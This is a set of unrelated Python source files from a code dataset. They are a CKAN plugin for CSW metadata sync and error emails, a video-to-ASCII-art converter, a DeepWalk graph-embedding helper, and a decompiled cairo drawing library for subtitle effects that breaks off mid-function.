'NASA-DIF',\n 'generator': 'CSW',\n 'url': self._build_csw_request_url(\n pkg_id, output_schema='nasa-dif', output_format='application/xml'),\n 'weight': 35,\n 'format': 'xml',\n },\n ])\n \n return pkg_dict\n\n ## Helpers ##\n \n def _build_csw_request_url(self, pkg_id, output_schema='dc', output_format=None):\n '''Build a GetRecordById request to a CSW endpoint\n '''\n \n qs_params = {\n 'service': 'CSW',\n 'version': '2.0.2',\n 'request': 'GetRecordById',\n 'ElementSetName': 'full',\n 'OutputSchema': self.csw_output_schemata.get(output_schema, ''),\n 'Id': pkg_id,\n }\n \n if output_format:\n qs_params['OutputFormat'] = output_format\n \n return self._pycsw_service_endpoint + '?' + urllib.urlencode(qs_params)\n\n def _create_or_update_csw_record(self, session, pkg_dict):\n '''Sync dataset with CSW record'''\n \n pkg_id = pkg_dict['id']\n\n if pkg_dict.get('state', 'active') != 'active':\n log1.info(\n 'Skipped sync of non-active dataset %s to CSW record' % (pkg_id))\n return\n\n record = ext_pycsw_sync.create_or_update_record(session, pkg_dict)\n if record: \n log1.info('Saved CswRecord %s (%s)', record.identifier, record.title)\n else:\n log1.warning('Failed to save CswRecord for dataset %s' %(pkg_id))\n \n return\n\n def _delete_csw_record(self, session, pkg_dict):\n '''Delete CSW record'''\n record = ext_pycsw_sync.delete_record(session, pkg_dict)\n if record:\n log1.info('Deleted CswRecord for dataset %s', pkg_dict['id']) \n return\n\nclass ErrorHandler(p.SingletonPlugin):\n '''Fix CKAN's buggy errorware configuration'''\n p.implements(p.IConfigurer, inherit=True)\n\n @staticmethod\n def _exception_as_mime_message(exc_data, to_addresses, from_address, prefix):\n from weberror.reporter import as_str\n from weberror.formatter import format_text\n\n msg = weberror.reporter.MIMEText(format_text(exc_data)[0])\n msg['Subject'] = as_str(prefix + exc_data.exception_value)\n msg['From'] = as_str(from_address)\n msg['Reply-To'] = as_str(from_address)\n msg['To'] = as_str(\", \".join(to_addresses))\n msg.set_type('text/plain')\n msg.set_param('charset', 'UTF-8')\n return msg\n\n def update_config(self, config):\n from weberror.reporter import EmailReporter as error_reporter\n \n # Override default config options for pylons errorware\n error_config = config['pylons.errorware']\n error_config.update({\n 'error_subject_prefix' : config.get('ckan.site_title') + ': ',\n 'from_address' : config.get('error_email_from'),\n 'smtp_server' : config.get('smtp.server'),\n 'smtp_username': config.get('smtp.user'),\n 'smtp_password': config.get('smtp.password'),\n 'smtp_use_tls' : config.get('smtp.starttls'),\n })\n \n # Monkey-patch email error reporter \n error_reporter.assemble_email = lambda t, exc: self._exception_as_mime_message(\n exc, \n to_addresses=t.to_addresses, \n from_address=t.from_address,\n prefix=t.subject_prefix)\n\nclass SpatialDatasetForm(DatasetForm):\n '''Extend the dataset-form to recognize and read/write the `spatial` extra field.\n This extension only serves as a bridge to ckanext-spatial `spatial_metadata` \n plugin.\n \n Note: \n This should be part of a the ordinary `publicamundi_dataset` plugin (when it\n gets decoupled from schema-handling logic!).\n '''\n \n ## IDatasetForm interface ##\n\n def create_package_schema(self):\n schema = super(SpatialDatasetForm, self).create_package_schema()\n return self.__modify_package_schema(schema)\n\n def update_package_schema(self):\n schema = super(SpatialDatasetForm, self).update_package_schema()\n return self.__modify_package_schema(schema)\n \n def show_package_schema(self):\n schema = super(SpatialDatasetForm, self).show_package_schema()\n \n ignore_missing = toolkit.get_validator('ignore_missing')\n convert_from_extras = toolkit.get_converter('convert_from_extras')\n \n schema['spatial'] = [convert_from_extras, ignore_missing]\n\n return schema\n \n def __modify_package_schema(self, schema):\n \n ignore_empty = toolkit.get_validator('ignore_empty')\n convert_to_extras = toolkit.get_converter('convert_to_extras')\n \n schema['spatial'] = [ignore_empty, convert_to_extras]\n \n return schema\n\n","sub_path":"ckanext/publicamundi/plugins.py","file_name":"plugins.py","file_ext":"py","file_size_in_byte":33205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"181961878","text":"from PIL import Image, ImageDraw, ImageFont\nimport os\nimport cv2\nimport ffmpeg\n\n#Ascii Video Config \nhoriMultiplyer = 30\t\t\t\t\t\t\t\t\t\t\t\t\t\t#pixel width for a single character\nvertMultiplyer = 30\nsourceFPS = 0\nfontSize = 40\nmaxWidth = 100\nisColor = False\nbrightnessAdjustment = -5\nnumberOfCharacters = 0\ngreyscaleChars = {}\nbackgroundColor = (0,0,0)\nfontColor = (255, 255, 255)\n\n\ndef generateFrameConversionData(imgPath):\n #take a colour image\n #take image, shrink and convrt to colour and greyscale\n #return list of tuple with ascii basey on gray value, and colour pix value for EACH pixel\n global maxWidth\n global isColor\n global brightnessAdjustment\n global numberOfCharacters\n global greyscaleChars\n global fontColor\n\n divisor = 255 / numberOfCharacters\n imgData = []\n #Greyscale to ASCII characters\n img = Image.open(imgPath)\n img = img.convert(\"RGB\")\n gImg = img.convert(\"L\")\n size = gImg.size\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#Get the size\n shrinkRatio = size[0] / maxWidth\t\t\t\t\t\t\t\t\t\t\t#Get the ratio to shring by to make it the max Width\n gImg = gImg.resize((int(size[0]/shrinkRatio) ,int(size[1]/shrinkRatio)))\t#Resize the image\n img = img.resize((int(size[0]/shrinkRatio) ,int(size[1]/shrinkRatio)))\t\t#Resize the image\n size = gImg.size\n for y in range (0,size[1]):\t\t\t\t\t\t\t\t\t\t\t\t\t#For ever row. 0,0 is the top left.\n for x in range (0,size[0]):\t\t\t\t\t\t\t\t\t\t\t\t#For every column\n pix = gImg.getpixel((x,y))\n if isColor == True:\n pixColour = img.getpixel((x,y))\n else:\n pixColour = fontColor\t\t\t\t\t\t\t\t\t\t\t#Get the pixel shade (0 - 255)\n pix = brightnessAdjust(pix, brightnessAdjustment)\t\t\t\t#adjust the brightness of the individual pixel\n pix = int(pix / divisor)\t\t\t\t\t\t\t\t\t\t\t#assign pixel shade to an ascii character\n asciiChar = greyscaleChars[str(pix)]\t\t\t\t\t\t\t\t#Create the output string\n imgData.append((asciiChar,pixColour))\n asciiChar = \"\\n\"\n pixColour = (0,0,0)\n imgData.append((asciiChar,pixColour))\n root, ext = os.path.splitext(imgPath)\n print(\"Conversion data generated:\\t\" + imgPath)\n return (generateColourAsciiFrame(imgData, root + '_a' + ext))\n\ndef brightnessAdjust(value, percent):\n\tnewValue = 0\t\t\t\t\t\t\t\t\t\t\t#init new pixel value\n\tpercent = percent / 100\t\t\t\t\t\t\t\t\t#convert percentage to decimal\n\tnewValue = int((value * percent) + value)\t\t\t\t#add or sub percentage from original value\n\n\tif newValue > 255:\t\t\t\t\t\t\t\t\t\t#if new value past the max threshold\n\t\tnewValue = 255\t\t\t\t\t\t\t\t\t\t#cap at 255\n\telif newValue < 0:\t\t\t\t\t\t\t\t\t\t#if below\n\t\tnewValue = 0\t\t\t\t\t\t\t\t\t\t#cap at 0\n\treturn newValue\t\t\t\t\t\t\t\t\t\t\t#return the new value\n\ndef generateColourAsciiFrame(data, newFileName):\n\tglobal horiMultiplyer\n\tglobal vertMultiplyer\n\tglobal fontSize\n\tglobal backgroundColor\n\tx = 0\n\ty = 0\n\tstringData = \"\"\n\tstringList = []\n\tfor s in data:\n\t\ts, _ = s\n\t\tstringData = stringData + s\n\t\tstringList = stringData.split(\"\\n\")\n\thorChars = len(stringList[0])\n\tvertChars = len(stringList)- 1\n\timgHeight = vertChars * vertMultiplyer\n\timgWidth = horChars * horiMultiplyer\n\timg = Image.new(\"RGB\", (imgWidth, imgHeight), color=backgroundColor)\n\tdraw = ImageDraw.Draw(img)\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#crete a draw object\n\tfont = ImageFont.truetype(\"fonts/cour.ttf\", fontSize)\n\tfor d in data:\n\t\tpix, col = d\n\t\tif pix == \"\\n\":\n\t\t\ty = y + vertMultiplyer\n\t\t\tx = 0\n\t\telse:\n\t\t\tdraw.text((x, y), str(pix), fill=col, font=font, align=\"left\")\n\t\t\tx = x + horiMultiplyer\n\tnewWidth = int(imgWidth * 0.5)\n\tnewHeight = int(imgHeight * 0.5)\n\tprint(newWidth)\n\tprint(newHeight)\n\timg = img.resize((newWidth,newHeight))\n\timg.save(newFileName)\n\tprint(\"\\tAscii Frame Generated:\\t\" + newFileName)\n\treturn(newFileName)\n\ndef videoToFrames(vidFile):\n\tfileList = []\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#init empty list to store file names and track order\n\tmaxWidth = 160\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#specify max width of resized frames\n\tglobal sourceFPS\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#access global variable storing video FPS\n\tvidcap = cv2.VideoCapture(vidFile)\t\t\t\t\t\t\t\t\t\t\t#access the source video file\n\tsourceFPS = vidcap.get(cv2.CAP_PROP_FPS)\t\t\t\t\t\t\t\t\t#determine the FPS of the video file\n\tsuccess,image = vidcap.read()\t\t\t\t\t\t\t\t\t\t\t\t#read the first frame of the video\n\tcount = 0\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#initialize a coutner to track frame numbers\n\twhile success:\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#while successfully reading frames\n\t\twidth, height, _ = image.shape\t\t\t\t\t\t\t\t\t\t\t#get the frame dimensions\n\t\tshrinkRatio = width / maxWidth\t\t\t\t\t\t\t\t\t\t\t#Get the ratio to shrink by to make it the max Width\n\t\timage = cv2.resize(image, (int(height/shrinkRatio),int(width/shrinkRatio)))\t#resize the frame\n\t\t#image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\t\t\t\t\t\t\t#convert frame to greyscale\n\t\tcv2.imwrite(\"temp/frames/frame%d.jpg\" % count, image) \t\t\t\t\t\t\t#save frame as JPEG file\n\t\tfileList.append(\"temp/frames/frame%d.jpg\" % count)\t\t\t\t\t\t\t\t\t#append filename to list\n\t\tsuccess,image = vidcap.read()\t\t\t\t\t\t\t\t\t\t\t#read the next frame\n\t\tprint(\"Frame \" + str(count) + \" successfully read\")\t\t\t\t\t\t#print to console\n\t\tcount += 1\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#increment the counter\n\treturn(fileList)\n\ndef imagesToMovie(fileList, videoname):\n global sourceFPS\n frameRate = sourceFPS\n frame = cv2.imread(fileList[0])\n height, width, layers = frame.shape\n video = cv2.VideoWriter(videoname, cv2.VideoWriter_fourcc('M','J','P','G'),frameRate,(width, height))\n for f in fileList:\n frame = cv2.imread(f)\n video.write(frame)\n print(f + \" Written to video\")\n video.release()\n\ndef transferAudioBetweenVideos(vidSrc, vidDst):\n\tsrcInput = ffmpeg.input(vidSrc)\n\tdstInput = ffmpeg.input(vidDst)\n\tffmpeg.output(srcInput.audio, dstInput.video, \"audio_\" + vidDst).run()\n\n\tos.remove(vidDst)\n\tos.rename((\"audio_\" + vidDst), vidDst)\n\nvidContent = [] #list of file names ASCII content\nnewFrames = [] #may not be required anymore\n\nwith open(\"characters.txt\") as fh:\n for line in fh:\n command, description = line.strip().split(',', 1)\n description = description.strip()\n if not description:\n description = \" \"\n \n greyscaleChars[command] = description\n\n#greyscaleChars = lines\nnumberOfCharacters = len(greyscaleChars)\n\nsrcVideo = input(\"Enter name of source video:\\t\")\ndstVideo = input(\"Enter name for new ascii video:\\t\")\n\n#Convert video to frames\nsrcFrames = videoToFrames(srcVideo)\n\n#For each frame, generate the conversion data\nfor frame in srcFrames:\n vidContent.append(generateFrameConversionData(frame))\n\nprint(\"************************************\")\nprint(\"************************************\")\nimagesToMovie(vidContent, dstVideo)\ntransferAudioBetweenVideos(srcVideo,dstVideo)\n\nfor f in srcFrames:\n os.remove(f)\nfor f in vidContent:\n os.remove(f)\n","sub_path":"vid2ascii.py","file_name":"vid2ascii.py","file_ext":"py","file_size_in_byte":6741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"209017073","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport random\n# from io import open\n# from argparse import ArgumentParser, FileType, ArgumentDefaultsHelpFormatter\nfrom collections import Counter\nfrom deepwalk import graph\nfrom deepwalk import walks as serialized_walks\nfrom gensim.models import Word2Vec\nfrom deepwalk.skipgram import Skipgram\nimport numpy as np\n\n\ndef run_dw(matrix,\n num_walks=100,\n walk_length=5,\n representation_size=32,\n window_size=2,\n undirected=True,\n seed=0,\n workers=1):\n random.seed(seed)\n np.random.seed(seed)\n adj_list = []\n for n, edges in enumerate(matrix):\n adj_list.append([n] + edges.nonzero()[0].tolist())\n\n print(adj_list)\n\n G = graph.from_adjlist(adj_list)\n if undirected:\n G.make_undirected()\n\n print(\"Number of nodes: {}\".format(len(G.nodes())))\n num_walks = len(G.nodes()) * num_walks\n\n print(\"Number of walks: {}\".format(num_walks))\n\n data_size = num_walks * walk_length\n\n print(\"Data size (walks*length): {}\".format(data_size))\n\n if data_size < 1000000000:\n print(\"Walking...\")\n walks = graph.build_deepwalk_corpus(G,\n num_paths=num_walks,\n path_length=walk_length,\n alpha=0,\n rand=random.Random(seed))\n print(\"Training...\")\n model = Word2Vec(walks,\n size=representation_size,\n window=window_size,\n min_count=0,\n sg=1,\n hs=1,\n workers=workers)\n else:\n print(\n \"Data size {} is larger than limit (max-memory-data-size: {}). Dumping walks to disk.\".\n format(data_size, 1000000000))\n print(\"Walking...\")\n\n walks_filebase = str(adj_list) + \".walks\"\n walk_files = serialized_walks.write_walks_to_disk(G,\n walks_filebase,\n num_paths=num_walks,\n path_length=walk_length,\n alpha=0,\n rand=random.Random(seed),\n num_workers=workers)\n\n print(\"Counting vertex frequency...\")\n #if not args.vertex_freq_degree:\n vertex_counts = serialized_walks.count_textfiles(walk_files, workers)\n #else:\n # # use degree distribution for frequency in tree\n # vertex_counts = G.degree(nodes=G.iterkeys())\n\n print(\"Training...\")\n walks_corpus = serialized_walks.WalksCorpus(walk_files)\n model = Skipgram(sentences=walks_corpus,\n vocabulary_counts=vertex_counts,\n size=representation_size,\n window=window_size,\n min_count=0,\n trim_rule=None,\n workers=workers,\n seed=seed)\n\n embeddings = np.zeros((len(G.nodes()), representation_size))\n\n for i in range(len(G.nodes())):\n embeddings[i] = model.wv.get_vector(str(i))\n\n return embeddings\n\n\ndef main():\n input_test = np.ones((2, 2))\n # input_test[0][1] = 1\n # input_test[1][0] = 1\n\n print(run_dw(input_test))\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"envs/run_deep_walk.py","file_name":"run_deep_walk.py","file_ext":"py","file_size_in_byte":3658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"181256325","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\kafx\\libs\\draw\\extra.py\n# Compiled at: 2012-03-25 17:53:08\n\"\"\"\n.. module:: libs.draw.extra\n :platform: Unix, Windows\n :synopsis:\n This module contains useful functions on which other drawing functions depend.\n.. moduleauthor:: Kafx team http://kafx.com.ar\n\"\"\"\nfrom math import ceil\nfrom random import random\nimport itertools, cairo\nfrom libs import video, common\nimport basic, advanced\ndebugi = -1\n\ndef DebugCairo(folder='caps/'):\n global debugi\n debugi += 1\n video.cf.ctx.get_group_target().write_to_png(folder + str(debugi).zfill(5) + '.png')\n\n\ndef LoadSequence(folder, count, digits=3, extend=cairo.EXTEND_NONE):\n \"\"\"Loads a set of textures\n @folder : folder containing the images\n if there's a common prefix you can include it,\n use '/'\n\n @count : image count [0 -> count-1]\n\n @digits: number of digits used\n\n @extend: texture's extend (default EXTEND_NONE)\n if used with cSprite extend must be set to cairo.EXTEND_NONE\n \"\"\"\n return [ LoadTexture(folder + str(i).zfill(digits) + '.png', extend) for i in range(count)\n ]\n\n\ndef LoadTexture(filename, extend=cairo.EXTEND_REPEAT):\n \"\"\"Returns a cairo texture (`cairo.SurfacePattern`) using a png filename\n Used in set_source or whatever\n @filename: png filename\n\n @extend: texture's extend (default `cairo.EXTEND_REPEAT`)\n if used with cSprite extend MUST be set to `cairo.EXTEND_NONE`\n \"\"\"\n t = cairo.SurfacePattern(cairo.ImageSurface.create_from_png(filename))\n t.set_extend(extend)\n return t\n\n\ndef MoveTexture(pattern, x, y, org_x=0.0, org_y=0.0, angle=0.0, scale_x=1.0, scale_y=1.0):\n \"\"\"Moves, rotates and scales a texture loaded with LoadTexture, or any other cairo pattern\"\"\"\n pattern.set_matrix(CreateMatrix(x, y, org_x, org_y, angle, scale_x, scale_y, True))\n\n\ndef SetStyle(style):\n \"\"\"Prepares cairo with the styles\n Before drawing any text you can call this function to set up the basic stuff\n the style type has to be :class:`libs.asslib.cProperties`\n \"\"\"\n ctx = video.cf.ctx\n ctx.select_font_face(style._font, int(style._italic), int(style._bold))\n ctx.set_font_size(style._size)\n\n\ndef CreateMatrix(pos_x=0, pos_y=0, org_x=0, org_y=0, angle=0, scale_x=1, scale_y=1, inverse=False):\n \"\"\"Creates a matrix with standard transforms\n pos_x, pos_y: x/y final position\n org_x, org_y: origin for the transform\n angle: (radians)\n scale_x scale_y: obvious, ain't it?\n inverse = False inverse matrices or not\n scales must be inverted if matrix is inverse: scale=1.0/scale\"\"\"\n m = cairo.Matrix()\n if not scale_x:\n scale_x = 1e-05\n if not scale_y:\n scale_y = 1e-05\n if inverse:\n m.translate(org_x, org_y)\n m.rotate(angle)\n m.scale(scale_x, scale_y)\n m.translate(-pos_x, -pos_y)\n else:\n m.translate(pos_x, pos_y)\n m.scale(scale_x, scale_y)\n m.rotate(-angle)\n m.translate(-org_x, -org_y)\n return m\n\n\nclass cCairoColor():\n \"\"\"Class for solid colors\"\"\"\n\n def __init__(self, number=None, text='', ccolor=None, components=None):\n \"\"\"\n 4 independent ways to initialize\n If no argument is given the resultant is White\n @number through FromNumber, receives an integer (0xAARRGGBB)\n @texto through FromText, receives a string ('AARRGGBB')\n @ccolor through CopyFrom, receives a cCairoColor object\n \"\"\"\n if number is not None:\n self.FromNumber(number)\n elif text:\n self.FromText(text)\n elif ccolor:\n self.CopyFrom(ccolor)\n elif components:\n self.a, self.r, self.g, self.b = components\n else:\n self.r = self.g = self.b = self.a = 1.0\n return\n\n def Pattern(self):\n \"\"\"Returns a cairo patter for usage in functions receiving one\n you can also use video.cf.ctx.set_source_rgba(a.r, a.g, a.b, a.a) directly\n but this syntax is way better, right?\"\"\"\n return cairo.SolidPattern(self.r, self.g, self.b, self.a)\n\n def FromText(self, color):\n \"\"\"Creates a color from another\n color may be either '&HAARRGGBB' or 'AARRGGBB'\n \"\"\"\n if color[0] == '&':\n color = color[1:]\n if color[0].lower() == 'h':\n color = color[1:]\n color.zfill(8)\n self.a = (255 - ord(color[:2].decode('hex'))) / 255.0\n self.b = ord(color[2:4].decode('hex')) / 255.0\n self.g = ord(color[4:6].decode('hex')) / 255.0\n self.r = ord(color[6:8].decode('hex')) / 255.0\n\n def FromNumber(self, color):\n \"\"\"Creates a color from another\n color is an integer: 31238231 or 0xAARRGGBB\"\"\"\n self.b = (color & 255) / 255.0\n color >>= 8\n self.g = (color & 255) / 255.0\n color >>= 8\n self.r = (color & 255) / 255.0\n color >>= 8\n self.a = color / 255.0\n\n def CopyFrom(self, other):\n \"\"\"Copies a color\n @other is a cCairoColor object\"\"\"\n self.r = other.r\n self.g = other.g\n self.b = other.b\n self.a = other.a\n\n def Interpolate(self, progress, other, inter=common.i_lineal):\n \"\"\"\n Linear interpolation of two colors\n\n :param progress:\n [0,1] interpolation factor/ratio\n 0 means the first color, 1 the second color\n values in between are interpolated\n :param other: color to interpolate to\n :type progress: double\n :type other: :class:`libs.draw.extra.cCairoColor`\n\n \"\"\"\n i = common.Interpolate\n self.r = i(progress, self.r, other.r, inter)\n self.g = i(progress, self.g, other.g, inter)\n self.b = i(progress, self.b, other.b, inter)\n self.a = i(progress, self.a, other.a, inter)\n\n\nclass cVector():\n \"\"\"Base cairo object class includes drawing utils for cairo\n it may be instanced @text or @figure or using the setters afterwards\n \"\"\"\n P_SOLID = 0\n P_TEXTURE = 1\n P_DEG_VERT = 2\n P_DEG_HOR = 3\n P_DEG_DIAG = 4\n P_DEG_RAD = 5\n P_AN_DEG_LIN = 6\n P_AN_DEG_RAD = 7\n P_COLORED_PATTERN = 8\n PART_BORDER = 0\n PART_FILL = 1\n PART_SHADOW = 2\n PART_PARTICLE = 3\n\n def __init__(self, text='', style=None, figure=None, parent=None, last_pos=None):\n \"\"\"Parameters\n @style cProperties object to inherit from\n @text creates an object from text\n @figure from ass shape\n @parent parent object\n \"\"\"\n from libs import asslib\n self.progress = 0.0\n self._end = 0\n self._start = 0\n self._dur = 0\n self._indice = 0\n self._parent = parent\n self._next_x = 0\n self._next_y = 0\n self.effect = 0\n self.textures = [None, None, None, None]\n self.original = asslib.cProperties(style)\n self.actual = asslib.cProperties(style)\n self.matrix = None\n self._UpdateMatrix()\n self._text = ''\n self.pointsw = None\n self._old_path = self.path = None\n self._pat_cache = None\n if figure:\n self.CreateFromFigure(figure)\n elif text is not None:\n self.SetText(text, last_pos=last_pos)\n return\n\n def _SetTextVertPos(self):\n \"\"\"Updates vertical align from the ass align\n it is recommended to use _SetTextProps instead\n \"\"\"\n props = self.original\n vert = ceil(props._align / 3.0)\n if vert == 1:\n props.pos_y = video.vi.height - props._marginv\n elif vert == 2:\n props.pos_y = (video.vi.height - props._line_height) / 2\n else:\n props.pos_y = props._marginv - props._y_bearing\n\n def _SetTextHorizPos(self):\n \"\"\"Updates horizontal align from the ass align\n it is recommended to use _SetTextProps instead\n 1=bottom, 2=mid, 3=top\n \"\"\"\n props = self.original\n horiz = props._align % 3\n if horiz == 1:\n props.pos_x = props._marginl\n elif horiz == 2:\n props.pos_x = (video.vi.width - props._width) / 2.0\n else:\n props.pos_x = video.vi.width - props._width - props._marginr\n\n def _SetTextProps(self, lasts=None):\n \"\"\"Sets properties according to text\n used when the text is created\n (usually position and size)\n @lasts -> coordinates for the text to start\n @return -> coordinates for the next text [[TO-DO] - Check this stuff, it doesn't make much sense]\n\n \"\"\"\n ctx = video.cf.ctx\n props = self.original\n SetStyle(props)\n props._x_bearing, props._y_bearing, props._width, props._height, props._x_advance, props._y_advance = ctx.text_extents(self._text)\n props._ascent, props._descent, props._line_height, props._max_x_advance, props._max_y_advance = ctx.font_extents()\n if lasts:\n props.pos_x = lasts[0]\n props.pos_y = lasts[1]\n else:\n self._SetTextHorizPos()\n self._SetTextVertPos()\n if self._parent and props.angle:\n props.org_x = 0\n props.org_y = 0\n props._x_advance, props._y_advance = self._parent.matrix.transform_distance(props._x_advance, props._y_advance)\n else:\n props.org_x = props._width / 2.0\n props.org_y = -(props._line_height / 2.0) + props._descent\n self.actual.CopyAllFrom(props)\n self._next_x = props.pos_x + props._x_advance\n self._next_y = props.pos_y + props._y_advance\n\n def _SetPathProps(self):\n \"\"\"Sets props for the path\n it must be the active path\n \"\"\"\n o = self.original\n e = video.cf.ctx.path_extents()\n o._width = e[2] - e[0]\n o._height = o._line_height = e[3] - e[1]\n o._x_bearing = e[0]\n o._y_bearing = e[1]\n o.org_x = o._x_bearing + o._width / 2.0\n o.org_y = -(o._height / 2.0)\n self.actual.CopyAllFrom(o)\n\n def GetShape(self):\n \"\"\"\n Creates a string like 'm 13 13 13 31 b 31 31 13 31' used in ass subs\n this is for zheo, ass sucks, don't use it, seriously, do NEVER use it,\n just for you to know a little bit more about ass and useless stuff\n \"\"\"\n figura = ''\n lp = ''\n mapa = ['m ', 'l ', 'b ', 'c ']\n if self._old_path:\n for t, p in self._old_path:\n figura += lp\n if t < 3:\n lp = mapa[t]\n for coord in p:\n lp += str(int(round(coord))) + ' '\n\n mapa[0] = 'n '\n else:\n lp = ''\n mapa[0] = 'm '\n\n figura += ' c'\n return figura\n\n def CreateFromFigure(self, ass):\n \"\"\"SLOW - vector from ass shape\"\"\"\n arr = ass.lower().split(' ')\n ctx = video.cf.ctx\n ctx_funcs = (\n ctx.move_to,\n ctx.line_to,\n ctx.curve_to,\n ctx.close_path)\n\n def get(a, i):\n return [ float(a.pop(0) if a else 0.0) for x in xrange(i) ]\n\n ctx.new_path()\n t = 'm'\n while arr:\n if arr[0] in 'mnlbsc':\n t = arr.pop(0)\n if t == 'm' or t == 'n':\n ctx_funcs[3]()\n ctx_funcs[0](*get(arr, 2))\n elif t == 'l':\n ctx_funcs[1](*get(arr, 2))\n elif t == 'b' or t == 's':\n ctx_funcs[2](*get(arr, 6))\n\n ctx_funcs[3]()\n self._old_path = self.path = ctx.copy_path()\n self._SetPathProps()\n\n def _UpdateMatrix(self):\n a = self.actual\n self.matrix = CreateMatrix(a.pos_x + a.org_x, a.pos_y - a.org_y, a.org_x, a.org_y, a.angle, a.scale_x, a.scale_y, False)\n\n def _UpdateTextPath(self):\n SetStyle(self.original)\n ctx = video.cf.ctx\n ctx.new_path()\n ctx.text_path(self._text)\n self._old_path = self.path = ctx.copy_path()\n\n def SetText(self, text, last_pos=None):\n \"\"\"SLOW:\n Changes the text asociated to a vector\n @text used text\n It'll use the original properties but re-calculating position and stuff\n optional:\n @last_pos=None (x,y) coordinates of the last syllable\"\"\"\n self._text = text\n self._SetTextProps(last_pos)\n self._UpdateTextPath()\n\n def Deform(self, func):\n \"\"\"Deforms vector object\n @func is a function called once for each point group in the vector, receives the following params:\n self : Dialog you want to Deform\n tipo : Integer indicating the point type (0=move, 1=line, 2=curve, 3=close (from some cairo stuff))\n points : coordinates array\n returns a modified points array\n \"\"\"\n ctx = video.cf.ctx\n ctx_funcs = (\n ctx.move_to,\n ctx.line_to,\n ctx.curve_to)\n ctx.new_path()\n for t, p in self._old_path:\n if t < 3:\n p = func(self, t, p)\n ctx_funcs[t](*p)\n else:\n ctx.close_path()\n\n self.path = ctx.copy_path()\n\n def CompleteDeform(self, func):\n \"\"\"Like Deform but it only receives an object, it's expected to return just a coordinates array\n This leads to better control of the points\n \"\"\"\n ctx = video.cf.ctx\n ctx_funcs = (\n ctx.move_to,\n ctx.line_to,\n ctx.curve_to)\n ctx.new_path()\n for t, p in func(self, self._old_path):\n if t < 3:\n ctx_funcs[t](*p)\n else:\n ctx.close_path()\n\n self.path = ctx.copy_path()\n\n def __GroupPath(self, path):\n gpath = []\n thispath = []\n if not path:\n return [[(1, (0.0, 0.0))]]\n for i in path:\n if i[0] == 3:\n if thispath:\n gpath.append(thispath)\n thispath = []\n else:\n thispath.append(i)\n\n if thispath:\n gpath.append(thispath)\n return gpath\n\n def __NormalizePath(self, fg, tg):\n lastfp = fg[0]\n lasttp = tg[0]\n fromg = []\n tog = []\n for fp, tp in itertools.izip_longest(fg, tg, fillvalue=None):\n if not fp:\n fp = lastfp[:]\n if not tp:\n tp = lasttp[:]\n tfp, ttp = fp[0], tp[0]\n if tfp == 2 or ttp == 2:\n if tfp < 2:\n fpp = fp[1]\n fp = (\n 2, (lastfp[1][(-2)], lastfp[1][(-1)], fpp[0], fpp[1], fpp[0], fpp[1]))\n elif ttp < 2:\n tpp = tp[1]\n tp = (\n 2, (lasttp[1][(-2)], lasttp[1][(-1)], tpp[0], tpp[1], tpp[0], tpp[1]))\n fromg.append(fp)\n tog.append(tp)\n lastfp = fp\n lasttp = tp\n\n return (\n fromg, tog)\n\n def __NormalizePathGroups(self, a, b):\n lastf = a[0][:]\n lastt = b[0][:]\n frompg = []\n topg = []\n for fg, tg in itertools.izip_longest(a, b, fillvalue=None):\n if not fg:\n fg = lastf[:]\n a.append(lastf)\n if not tg:\n tg = lastt[:]\n b.append(lastf)\n lastf, lastt = self.__NormalizePath(fg, tg)\n frompg.append(lastf)\n topg.append(lastt)\n\n return (\n frompg, topg)\n\n def __FlattenPathGroup(self, path):\n for g in path:\n g.append((3, ()))\n\n return tuple(itertools.chain.from_iterable(path))\n\n def __CreateDiffPath(self, other):\n fgp = self.__GroupPath(self._old_path)\n tgp = self.__GroupPath(other.path)\n fgp, tgp = self.__NormalizePathGroups(fgp, tgp)\n self.__from_path = self.__FlattenPathGroup(fgp)\n self.__to_path = self.__FlattenPathGroup(tgp)\n\n def Morph(self, other):\n if not self._text:\n return\n if not hasattr(self, '__from_path'):\n self.__CreateDiffPath(other)\n ctx = video.cf.ctx\n ctx_funcs = (\n ctx.move_to,\n ctx.line_to,\n ctx.curve_to)\n ctx.new_path()\n for fcom, tcom, x in zip(self.__from_path, self.__to_path, itertools.count(1)):\n t = fcom[0]\n fpoints = fcom[1]\n tpoints = tcom[1]\n if t < 3:\n p = [ common.LERP(self.progress, i, j) for i, j in zip(fpoints, tpoints) ]\n ctx_funcs[t](*p)\n else:\n ctx.close_path()\n\n self.path = ctx.copy_path()\n\n def Restore(self):\n \"\"\"Restores a vector's style\"\"\"\n self.actual.CopyFrom(self.original)\n self.path = self._old_path\n\n def PaintWithCache(self, background=False, matrix=None):\n \"\"\"Uses cache to draw a vector.\n It's only created the first time you call it, it uses the cache afterwards\n optional\n @background=False Boolean, decides if the text receives the background\n @matrix=None transform matrix for EndGroup\n \"\"\"\n if self._pat_cache:\n ctx = video.cf.ctx\n ctx.set_source(self._pat_cache)\n ctx.paint()\n else:\n self._pat_cache = self.Paint(background, matrix)\n return self._pat_cache\n\n def DeleteCache(self):\n self._pat_cache = None\n return\n\n def Paint(self, background=False, matrix=None, matrix2=None):\n \"\"\"Draws a vector using current style.\n optional:\n @background=False Boolean, decides if the text receives the background\n @matrix=None -vector's- transform matrix\n @matrix2=None transform matrix for EndGroup\n \"\"\"\n a = self.actual\n ctx = video.cf.ctx\n advanced.StartGroup(background)\n if matrix:\n self.matrix = matrix\n else:\n self._UpdateMatrix()\n ctx.set_matrix(self.matrix)\n ctx.new_path()\n 